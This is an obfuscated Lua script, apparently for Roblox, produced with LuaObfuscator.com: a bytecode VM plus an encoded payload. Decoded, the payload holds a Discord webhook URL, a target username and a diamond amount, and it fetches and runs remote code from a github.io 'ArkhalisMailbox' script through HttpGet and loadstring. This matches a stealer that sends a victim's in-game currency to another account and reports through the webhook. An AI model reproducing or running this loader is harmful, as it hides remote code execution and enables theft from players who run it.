--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v69=0;while true do if (v69==0) then v19=v0(v3(v30,1,1));return "";end end else local v70=v2(v0(v30,16));if v19 then local v78=0;local v79;while true do if (v78==1) then return v79;end if (v78==0) then v79=v5(v70,v19);v19=nil;v78=1;end end else return v70;end end end);local function v20(v31,v32,v33)if v33 then local v71=0 -0 ;local v72;while true do if (v71==(0 -0)) then v72=(v31/((1067 -(68 + 997))^(v32-(2 -1))))%(((1273 -(226 + 1044)) -1)^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + (932 -((3731 -2874) + 74)))) ;return v72-(v72%(569 -(367 + 201))) ;end end else local v73=927 -(214 + 713) ;local v74;while true do if (v73==(0 + 0)) then v74=((118 -(32 + 85)) + 1)^(v32-(878 -(282 + 595))) ;return (((v31%(v74 + v74))>=v74) and (1638 -(1523 + 114))) or (0 + 0) ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=0 + 0 ;local v36;local v37;while true do if (v35==((0 + 0) -0)) then v36,v37=v1(v16,v18,v18 + 1 + 1 );v18=v18 + ((723 -541) -(67 + 113)) ;v35=1;end if (v35==(958 -((1844 -(802 + 150)) + 65))) then return (v37 * (610 -354)) + v36 ;end end end local function v23()local v38=0 -0 ;local v39;local v40;local v41;local v42;while true do if (v38==(0 -(0 + 0))) then v39,v40,v41,v42=v1(v16,v18,v18 + (5 -2) );v18=v18 + 3 + 1 ;v38=998 -(915 + 82) ;end if (v38==(1 -0)) then return (v42 * 16777216) + (v41 * (185570 -120034)) + (v40 * (454 -198)) + v39 ;end end end local function v24()local v43=v23();local v44=v23();local v45=792 -(368 + 423) ;local v46=(v20(v44,3 -2 ,38 -(10 + 8) ) * ((7 -5)^(474 -(416 + 26)))) + v43 ;local v47=v20(v44,66 -45 ,14 + 17 );local v48=((v20(v44,56 -24 )==(439 -(145 + 16 + 277))) and  -(431 -(44 + 386))) or ((526 + 961) -(998 + 488)) ;if (v47==(0 + 0)) then if (v46==0) then return v48 * 0 ;else v47=1 + 0 ;v45=772 -(201 + 571) ;end elseif (v47==((4070 -(261 + 624)) -(116 + 1022))) then return ((v46==(0 -0)) and (v48 * (((1 -0) + 0)/(0 -0)))) or (v48 * NaN) ;end return v8(v48,v47-(3632 -2609) ) * (v45 + (v46/(((1941 -(1020 + 60)) -(814 + 45))^(127 -75)))) ;end local function v25(v49)local v50=0;local v51;local v52;while true do if (v50==(1424 -(630 + 793))) then v51=v3(v16,v18,(v18 + v49) -(3 -2) );v18=v18 + v49 ;v50=9 -7 ;end if (v50==(2 + 1)) then return v6(v52);end if ((0 -0)==v50) then v51=nil;if  not v49 then v49=v23();if (v49==0) then return "";end end v50=1748 -(760 + 987) ;end if (v50==(1915 -(1789 + 124))) then v52={};for v80=767 -(745 + 21) , #v51 do v52[v80]=v2(v1(v3(v51,v80,v80)));end v50=2 + 1 ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0 -0 ;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (v53~=0) then else v54=0 -0 ;v55=nil;v53=414 -(15 + 398) ;end if (2==v53) then v58=nil;v59=nil;v53=3;end if (v53==(3 -2)) then v56=nil;v57=nil;v53=1826 -(1195 + 629) ;end if (v53==(5 -1)) then while true do if (v54~=(242 -(187 + 54))) then else v57=nil;v58=nil;v54=2;end if ((782 -(162 + 618))~=v54) then else v59=nil;v60=nil;v54=3;end if ((3 + 0)==v54) then v61=nil;while true do local v99=0;local v100;while true do if (v99~=(0 + 0)) then else v100=0 -0 ;while true do if (v100==(126 -(116 + 10))) then local v107=0 -0 ;while true do if (v107~=(0 + 0)) then else if (v55~=(738 -(542 + 196))) then else local v150=0;while true do if (v150~=(1638 -(1373 + 263))) then else v55=1001 -(451 + 549) ;break;end if (v150==(0 + 0)) then v56={};v57={};v150=1 + 0 ;end if (v150==1) then local v180=0 -0 ;while true do if (v180==(0 -0)) then v58={};v59={v56,v57,nil,v58};v180=1 + 0 ;end if (v180~=(1 -0)) then else v150=343 -(218 + 123) ;break;end end end end end if (v55~=(1583 -(1535 + 46))) then else local v151=0 + 0 ;while true do local v152=0 -0 ;while true do if (v152~=(0 + 0)) then else if (v151==(561 -(306 + 254))) then return v59;end if (v151~=(0 + 0)) then else local v183=0 -0 ;while true do if ((0 + 0)~=v183) then else for v184=1,v23() do local v185=0 -0 ;local v186;local v187;local v188;while true do if (v185==(977 -(553 + 424))) then local v191=1467 -(899 + 568) ;while true do if (v191==(0 + 0)) then v186=0 -0 ;v187=nil;v191=1;end if ((1 + 0)~=v191) then else v185=604 -(268 + 335) ;break;end end end if (v185==(1 + 0)) then v188=nil;while true do if (v186~=1) then else while true do if (v187==(0 + 0)) then v188=v21();if (v20(v188,291 -(60 + 230) ,573 -(426 + 146) )~=(0 + 0)) then else local v192=0;local v193;local v194;local v195;local v196;while true do if (v192~=(1 + 0)) then else local v197=0 -0 ;while true do if ((2 -1)==v197) then v192=2;break;end if (v197~=(1456 -(282 + 1174))) then else v195=nil;v196=nil;v197=812 -(569 + 242) ;end end end if ((5 -3)==v192) then while true do if (v193~=(1 + 2)) then else if (v20(v195,1027 -(706 + 318) ,1254 -(721 + 530) )==(4 -3)) then v196[757 -(239 + 514) ]=v61[v196[4]];end v56[v184]=v196;break;end if (2==v193) then local v200=0 + 0 ;local v201;while true do if (v200==0) then v201=1271 -(945 + 326) ;while true do if (v201~=(0 -0)) then else if (v20(v195,1 + 0 ,1330 -(797 + 532) )==(701 -(271 + 429))) then v196[2 + 0 ]=v61[v196[2]];end if (v20(v195,2,2 + 0 )==(1501 -(1408 + 92))) then v196[1089 -(461 + 625) ]=v61[v196[1291 -(993 + 295) ]];end v201=1;end if (v201==1) then v193=1205 -(373 + 829) ;break;end end break;end end end if (v193==1) then local v202=731 -(476 + 255) ;local v203;while true do if ((0 + 0)~=v202) then else v203=0 + 0 ;while true do if (v203==(1172 -(418 + 753))) then v193=1 + 1 ;break;end if (v203~=(238 -(64 + 174))) then else v196={v22(),v22(),nil,nil};if (v194==(529 -(406 + 123))) then local v211=0;while true do if ((216 -(42 + 174))~=v211) then else v196[3 + 0 ]=v22();v196[1773 -(1749 + 20) ]=v22();break;end end elseif (v194==1) then v196[3 + 0 ]=v23();elseif (v194==(1 + 1)) then v196[3]=v23() -((1506 -(363 + 1141))^(1596 -(1183 + 397))) ;elseif (v194~=(8 -5)) then else local v216=0 + 0 ;local v217;while true do if (v216~=(1322 -(1249 + 73))) then else v217=0 + 0 ;while true do if (v217==(0 + 0)) then v196[2 + 1 ]=v23() -((1147 -(466 + 679))^(1949 -(565 + 1368))) ;v196[9 -5 ]=v22();break;end end break;end end end v203=2 -1 ;end end break;end end end if (v193==(1900 -(106 + 1794))) then local v204=0;while true do if (v204==(1662 -(1477 + 184))) then v193=1 + 0 ;break;end if (v204~=0) then else v194=v20(v188,2 -0 ,3 + 0 );v195=v20(v188,4,862 -(564 + 292) );v204=1;end end end end break;end if (v192==(0 + 0)) then local v198=0 -0 ;while true do if ((304 -(244 + 60))==v198) then v193=0;v194=nil;v198=1;end if (v198==(2 -1)) then v192=1;break;end end end end end break;end end break;end if (v186~=(114 -(4 + 110))) then else v187=584 -(57 + 527) ;v188=nil;v186=1;end end break;end end end for v189=477 -(41 + 435) ,v23() do v57[v189-(1428 -(41 + 1386)) ]=v28();end v183=104 -(17 + 86) ;end if (v183~=1) then else v151=1 + 0 ;break;end end end break;end end end end v107=1 -0 ;end if (v107==1) then v100=2 -1 ;break;end end end if (v100~=(1 + 0)) then else if ((167 -(122 + 44))~=v55) then else v60=v23();v61={};for v115=1,v60 do local v116=0 + 0 ;local v117;local v118;local v119;while true do if (v116==1) then v119=nil;while true do if (v117~=(1138 -(782 + 356))) then else local v181=0 -0 ;while true do if (v181==(268 -(176 + 91))) then v117=3 -2 ;break;end if (v181==(0 + 0)) then v118=v21();v119=nil;v181=1 -0 ;end end end if (v117~=1) then else if (v118==(1093 -(975 + 117))) then v119=v21()~=(0 + 0) ;elseif (v118==2) then v119=v24();elseif (v118~=(5 -2)) then else v119=v25();end v61[v115]=v119;break;end end break;end if (v116==(0 + 0)) then v117=65 -(30 + 35) ;v118=nil;v116=1 + 0 ;end end end v59[1260 -(1043 + 214) ]=v21();v55=7 -5 ;end break;end end break;end end end break;end if (v54==(1212 -(323 + 889))) then local v98=0 -0 ;while true do if (v98~=(0 -0)) then else v55=0 -0 ;v56=nil;v98=1;end if (v98==1) then v54=1;break;end end end end break;end if ((583 -(361 + 219))==v53) then v60=nil;v61=nil;v53=324 -(53 + 267) ;end end end local function v29(v62,v63,v64)local v65=0;local v66;local v67;local v68;while true do if (1==v65) then v68=v62[3];return function(...)local v82=v66;local v83=v67;local v84=v68;local v85=v27;local v86=1;local v87= -1;local v88={};local v89={...};local v90=v12("#",...) -1 ;local v91={};local v92={};for v96=0,v90 do if (v96>=v84) then v88[v96-v84 ]=v89[v96 + 1 ];else v92[v96]=v89[v96 + 1 ];end end local v93=(v90-v84) + 1 ;local v94;local v95;while true do local v97=0;while true do if (v97==0) then v94=v82[v86];v95=v94[1];v97=1;end if (v97==1) then if (v95<=5) then if (v95<=2) then if (v95<=0) then v86=v94[3];elseif (v95>1) then v92[v94[2]]=v64[v94[3]];else v92[v94[2]][v94[3]]=v94[4];end elseif (v95<=3) then local v109=0;local v110;local v111;while true do if (v109==0) then v110=v94[2];v111=v92[v94[3]];v109=1;end if (v109==1) then v92[v110 + 1 ]=v111;v92[v110]=v111[v94[4]];break;end end elseif (v95>4) then local v124=0;local v125;while true do if (v124==0) then v125=v94[2];v92[v125]=v92[v125](v13(v92,v125 + 1 ,v87));break;end end else local v126=v94[2];local v127,v128=v85(v92[v126](v13(v92,v126 + 1 ,v94[3])));v87=(v128 + v126) -1 ;local v129=0;for v148=v126,v87 do local v149=0;while true do if (v149==0) then v129=v129 + 1 ;v92[v148]=v127[v129];break;end end end end elseif (v95<=8) then if (v95<=6) then if (v92[v94[2]]==v94[4]) then v86=v86 + 1 ;else v86=v94[3];end elseif (v95>7) then local v131=0;local v132;local v133;local v134;local v135;local v136;while true do if (v131==6) then v86=v94[3];break;end if (v131==4) then v87=(v134 + v136) -1 ;v132=0;for v177=v136,v87 do v132=v132 + 1 ;v92[v177]=v133[v132];end v86=v86 + 1 ;v94=v82[v86];v136=v94[2];v131=5;end if (v131==2) then v94=v82[v86];v136=v94[2];v135=v92[v94[3]];v92[v136 + 1 ]=v135;v92[v136]=v135[v94[4]];v86=v86 + 1 ;v131=3;end if (v131==0) then v132=nil;v133,v134=nil;v135=nil;v136=nil;v92[v94[2]][v94[3]]=v94[4];v86=v86 + 1 ;v131=1;end if (5==v131) then v92[v136]=v92[v136](v13(v92,v136 + 1 ,v87));v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]();v86=v86 + 1 ;v94=v82[v86];v131=6;end if (3==v131) then v94=v82[v86];v92[v94[2]]=v94[3];v86=v86 + 1 ;v94=v82[v86];v136=v94[2];v133,v134=v85(v92[v136](v13(v92,v136 + 1 ,v94[3])));v131=4;end if (v131==1) then v94=v82[v86];v92[v94[2]]=v64[v94[3]];v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]=v64[v94[3]];v86=v86 + 1 ;v131=2;end end else do return;end end elseif (v95<=9) then v92[v94[2]]=v94[3];elseif (v95==10) then v92[v94[2]]();else v92[v94[2]][v94[3]]=v94[4];v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]=v64[v94[3]];v86=v86 + 1 ;v94=v82[v86];v92[v94[2]][v94[3]]=v94[4];v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]=v94[3];v86=v86 + 1 ;v94=v82[v86];v86=v94[3];end v86=v86 + 1 ;break;end end end end;end if (v65==0) then v66=v62[1];v67=v62[2];v65=1;end end end return v29(v28(),{},v17)(...);end v15("LOL!0D3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3130393134362O31373534393036343236332F50795265476947373168754A4E36344373674433374D765A4B776230484F6166507A793343343566715A58525958724A705A6C5873464B4F445956304F5F6A6237704261030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403313O00682O7470733A2O2F61726B68616C69736C75612E6769746875622E696F2F41726B68616C69734D61696C626F782E6C756103083O00557365726E616D65030E3O0068696E6B2O6A6F6265726665726F03083O004469616D6F6E6473024O0080841E4100163O0012093O00013O0026063O000D0001000200044O000D0001001202000100033O00300800010004000500122O000100063O00122O000200073O00202O00020002000800122O000400096O000200046O00013O00024O00010001000100044O001500010026063O00010001000100044O00010001001202000100033O00300B0001000A000B00122O000100033O00302O0001000C000D00124O00023O00044O000100012O00073O00017O00",v9(),...);end
